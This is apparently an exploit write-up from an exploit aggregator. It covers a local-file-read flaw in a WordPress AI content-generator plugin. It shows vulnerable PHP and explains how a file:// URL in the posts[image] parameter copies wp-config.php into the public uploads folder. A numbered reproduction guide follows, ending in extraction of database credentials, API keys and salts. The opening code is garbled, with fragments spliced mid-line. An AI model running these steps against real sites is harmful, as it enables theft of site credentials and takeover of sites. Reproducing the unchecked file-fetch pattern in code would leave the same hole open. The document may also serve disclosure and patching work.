Share
## https://sploitus.com/exploit?id=D8E9CFDD-9218-5948-B327-42691D6B4DD8
# AI Engine for WordPress: ChatGPT, GPT Content Generator  true,
            'message' => __( 'Data is null!', 'lqdai' ),
        ] );
    }

    $args = [
        'ID'            => $posts['post_id'],
        'post_title'    => $posts['title'],
        'post_content'  => $posts['content'],
        'post_status'   => 'draft',
    ];

    $update_post = wp_update_post( $args );
    
    if ( is_wp_error( $update_post ) ) {
        wp_send_json( [
            'error' => true,
            'message' => $update_post->get_error_messages()
        ] );
    } else {
        wp_set_post_tags( $posts['post_id'], $posts['tags'], false );

        if ( !empty( $posts['image'] ) ) {
            $this->insert_image( $posts['post_id'], $posts['image'] );  //  $wp_filetype['type'],
        'post_title' => sanitize_file_name(str_replace('.jpg','', $filename)),
        'post_content' => '',
        'post_status' => 'inherit'
    );
    $attachment_id = wp_insert_attachment( $attachment, $file, $post_id );
    require_once(ABSPATH . 'wp-admin/includes/image.php');
    $attachment_data = wp_generate_attachment_metadata( $attachment_id, $file );
    wp_update_attachment_metadata( $attachment_id, $attachment_data );
    
    // Set the attachment ID as the featured image for the post
    set_post_thumbnail($post_id, $attachment_id);
}
```

### **Path Construction and File Naming**
The vulnerable path construction allows reading local files via the `file://` protocol:

```php
// User provides: 'file:///var/www/html/wp-config.php'
$image_url = 'file:///var/www/html/wp-config.php';

// file_get_contents() reads the file (works by default in PHP)
$image_data = file_get_contents($image_url);  // Reads /var/www/html/wp-config.php

// Filename is constructed from the path
$filename = sanitize_file_name(parse_url($image_url)['path']) . '.jpg';
// parse_url() returns '/var/www/html/wp-config.php'
// sanitize_file_name() removes slashes: 'varwwwhtmlwp-config.php'
// Appends '.jpg': 'varwwwhtmlwp-config.php.jpg'

// File is written to uploads directory
$file = $upload_dir['path'] . '/' . $filename;
// Result: /wp-content/uploads/2025/11/varwwwhtmlwp-config.php.jpg
file_put_contents($file, $image_data);  // Writes wp-config.php content
```



## Manual Reproduction
1. Login to WordPress as a Contributor (or any user with post editing capabilities).
2. Create a new post draft to obtain a post ID.
3. Use browser developer tools or a tool like Burp Suite to intercept traffic.
4. Intercept a request to `/wp-admin/admin-ajax.php` calling the `lqdai_update_post` action.
5. Modify the request to include a `file://` protocol URL in the `posts[image]` parameter.
6. Send the request with `posts[image]=file:///var/www/html/wp-config.php` to read the WordPress configuration file.
7. Access the file via the uploads directory URL: `/wp-content/uploads/YYYY/MM/varwwwhtmlwp-config.php.jpg`.
8. Extract sensitive configuration files including database credentials, API keys, and security salts.